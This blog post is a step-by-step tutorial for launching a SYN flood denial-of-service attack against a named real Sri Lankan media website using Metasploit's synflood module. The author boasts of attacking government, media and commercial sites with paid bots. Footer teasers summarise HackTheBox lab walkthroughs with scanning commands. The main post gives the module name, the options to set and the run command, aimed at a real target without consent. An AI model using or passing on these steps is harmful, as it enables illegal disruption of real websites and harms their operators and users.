Skip to main content

How To Launch A Syn Flood Attack To SriLankan Premier Media Site Sirasatv.lk

😜Currently I practised various types of Dos & DDos Attacks like Syn Flood💉Http Flood🦠Tcp Flood. etc.. I tried these types  attacks to various types of websites government,media & commercial sites also. I used some paids bot machines also to perform dos attacks..


A SYN flood is a form of denial-of-service attack in which an attacker rapidly initiates a connection to a server without finalizing the connection. The server has to spend resources waiting for half-opened connections, which can consume enough resources to make the system unresponsive to legitimate traffic.

Let See How to Hack Sirasatv. lk By Using Syn-Flood Attack

❤Requirements💉

1.Virtual Machine / Kali Linux / Parrot Security Os Or Any Linux Environment / Metasploit Framework

2.Victim's Host

3.Port


💉First We have to find host of Sirasatv.lk

💉You can find host very easily by using host command. And if You want you can use dmitry & Nmap like tools also..


💉How to find Ports of this websites

1.Use Nmap,Nikto,Dmitry like tools to gater information on Host

2.You can use Shoden.io to access Information

💉Here, You can see ports.. Port 80 & Port 443.And we use port 80 to attack


💉Let Start Our Attack😜

❤Open your Kali or any linux distribution terminal. And type "msfconsole"to start Metasploit Framework..


❤Then you have to use module called "auxiliary/dos/tcp/synflood
🥰Type this on your terminal
(use auxiliary/dos/tcp/synflood)

❤Now you have to set attack module by puting regarding information on it.

💉You can see options, You must set Rhost, Rport, Shost respectively


💉Put These Respectively..
1.set RHOST (Victims Host)
2.set RPORT (In this occasion don't want to change port. We are attacking on Port 80.it's already set.
3.set SHOST (Attackers Host)(Optional)
4.exploit Or run and hit enter to launch attack

😜EtherApe Gui (See How it work from this tool)


💉How to Stop Flooding..

(Press Control-C to stop attack)

💉Let See Results...

💉This is the output of the attack. While you are attacking no one can reach this site.If you perform attack on long time server will down...

🙄I think Security levels should be update... Any one can down this website by using dos attacks.. 😜Try At your Own Risk🦠

🥰Thanks For Reading My Content... Share and Like Us.....



Comments

Post a Comment

Popular posts from this blog

HackTheBox Active Machine Walkthrough - Knife 🗡️

😍A knife is only as good as the one who wields it Hocho Knife #Easy #Linux Machine created by MrKN16H went live 22 May 2021 at 19:00:00 UTC. 😜Let's Start the journey..... 🔐Enumeration🔰 💉From Dmitry result one thing caught my and that is it an apache httpd server instead of regular nginx in all the HackTheBox Machine. 🔰We can find 2 Open Ports. In Port 80 We can see web page. 🔧As the latest release for apache httpd is 2.4.46 there could be a known vuln in 2.4.41 so I looked for it on web. 🗽Looking for it I stumbled around this Rapid7 Post https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2020-1934/. 🔰But there is one concerning thing about this exploit you need to have mod_proxy_ftp module running and have FTP backend which we know nothing of. 🖥️Web-Visting🛡️ 🤔We can find this static page and nothing  interesting in it.  🔐Looking the source code found pen.js which looked interesting but after looking at it got nothing interesting. Also added knife.htb in /etc/h...
6 comments
Read more

HackTheBox Walkthrough - Explore

🛡️Types of OS : Android 🌞Released on : 26th June 2021 ☢️Difficulty : Easy 👍Point: 20 💉Running nmap scan: nmap -vv — reason -Pn -A — osscan-guess — version-all -p- $IP -oN Explore.nmap nmap_scan.report 💉Running the nmap scan gives four ports port 2222 — ssh port 59777 — http port 5555 — adbshell {This can be found by looking on  google } adb_shell_port ☢️Running FFUF ffuf -u  http://explore.htb:59777/FUZZ  -w /usr/share/wordlists/dirb/big.txt -t 200 -c ffuf_scan 😃Lets visit the web-page 😜As you can see its showing forbidden. So lets try some other directory. 😃And we get the same results. Lets try to enumerate port 59777 which service uses this port on android. ☺️we get this article from  Daily-Swigg  which explain the vulnerability in ES File explorer which exposes user data on open port and anyone can read it. 😏Lets try running FFUF on  http://explore.htb:59777/sdcard/ ffuf_sdcard 😏Look like we found our first flag. So easy 😁The POC for the above vulnerability can be found o...
3 comments
Read more

HacktheBox Walkthrough - Shoppy

🟥Name ➡️ Shoppy 🟥Release Date ➡️ 17 Sep 2022 🟥Retire Date ➡️ 14 Jan 2023 🟥OS  ➡️ Linux 🟥Base Points Easy ➡️ [20] 🟥First Blood User 6 mins, 03 seconds 22sh 🟥First Blood Root 12 mins, 37 seconds 22sh 👉Shoppy was much easier to exploit From there, I’ll need the lighest of reverse enginnering to get a static password from a binary, which gets me to the next user. 👉I’ll start by finding a website and use a NoSQL injection to bypass the admin login page, and another to dump users and hashes. 👉This user is in the docker group, so I’ll load an image mounting the host file system, and get full disk access. 👉Shoppy was one of the easier HackTheBox weekly machines to exploit, though identifying the exploits for the initial foothold could be a bit tricky. 👉With a cracked hash, I’ll log into a Mattermost server where I’ll find creds to the box that work for SSH. 👉In Beyond Root, a video walkthrough of the vulnerable web-server code, showing how the injections worked, an...
Post a Comment
Read more